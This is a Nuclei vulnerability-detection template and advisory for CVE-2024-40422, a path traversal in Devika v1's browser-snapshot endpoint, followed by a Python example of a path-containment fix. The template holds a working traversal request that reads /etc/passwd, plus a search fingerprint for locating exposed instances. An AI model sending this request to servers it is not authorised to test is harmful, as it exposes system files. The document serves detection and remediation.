Devika v1 - Path Traversal

ID: CVE-2024-40422

Severity: critical

Author: s4e-io,alpernae

Tags: cve,cve2024,devika,lfi

The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.

id: CVE-2024-40422

info:
  name: Devika v1 - Path Traversal
  author: s4e-io,alpernae
  severity: critical
  description: |
    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
    - https://cvefeed.io/vuln/detail/CVE-2024-40422
    - https://github.com/alpernae/CVE-2024-40422
    - https://github.com/stitionai/devika
    - https://www.exploit-db.com/exploits/52066
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-40422
    cwe-id: CWE-22
    epss-score: 0.0087
    epss-percentile: 0.82513
    cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: stitionai
    product: devika
    fofa-query: icon_hash="-1429839495"
  tags: cve,cve2024,devika,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/data HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
          - 'contains(content_type,"application/json")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: word
        part: header
        words:
          - "application/octet-stream"
      - type: status
        status:
          - 200
# digest: 490a0046304402207d06d28f14a6c0a0cc1494de904340bef4d20f80a083c623729da3cae83b49820220577b52f74b3e273d7833b59b886b040d072a2718391c7b8a73fd8d85f2dddaa4:922c64590222798bb761d5b6d8e72950

This Nuclei template detects the path traversal described above. Run it against a target URL with the Nuclei tool:

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-40422.yaml"
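
A containment check of the kind that closes this class of flaw (CWE-22), shown as an added example that is not Devika's code and not part of the template. The base directory, the function and exception names, and the sample files are assumptions constructed for illustration; only snapshot_path comes from the advisory.

```python
import os
import tempfile
from pathlib import Path

# Assumed names for illustration: UnsafePath, resolve_snapshot_path, base_dir.
# snapshot_path is the request parameter named in the advisory.


class UnsafePath(ValueError):
    """Raised when a requested path resolves outside the allowed directory."""


def resolve_snapshot_path(base_dir, snapshot_path):
    """Return the real path of snapshot_path if it stays inside base_dir."""
    if not snapshot_path or "\x00" in snapshot_path:
        raise UnsafePath("empty path or NUL byte")
    base = Path(base_dir).resolve(strict=True)
    # Joining with an absolute path discards base, so "/etc/passwd" is also
    # caught by the containment check below. resolve() collapses ".." and
    # follows symlinks before the comparison is made.
    candidate = (base / snapshot_path).resolve()
    if os.path.commonpath([str(base), str(candidate)]) != str(base):
        raise UnsafePath(f"{snapshot_path!r} escapes {base}")
    if not candidate.is_file():
        raise UnsafePath("not a regular file")
    return candidate


def demo():
    """Run the check over constructed inputs; returns {input: accepted?}."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = Path(root) / "screenshots"
        base.mkdir()
        (base / "shot.png").write_bytes(b"constructed sample")
        (Path(root) / "secret.txt").write_text("outside base")
        os.symlink(Path(root) / "secret.txt", base / "link.png")
        for p in ["shot.png", "../secret.txt", "../../../../etc/passwd",
                  "/etc/passwd", "sub/../shot.png", "link.png"]:
            try:
                resolve_snapshot_path(base, p)
                results[p] = True
            except UnsafePath:
                results[p] = False
    return results


if __name__ == "__main__":
    for path, ok in demo().items():
        print(f"{'ALLOW' if ok else 'DENY '} {path}")
```

The comparison is made on resolved paths, so a symlink inside the allowed directory that points outside it is rejected along with the `../` and absolute-path forms.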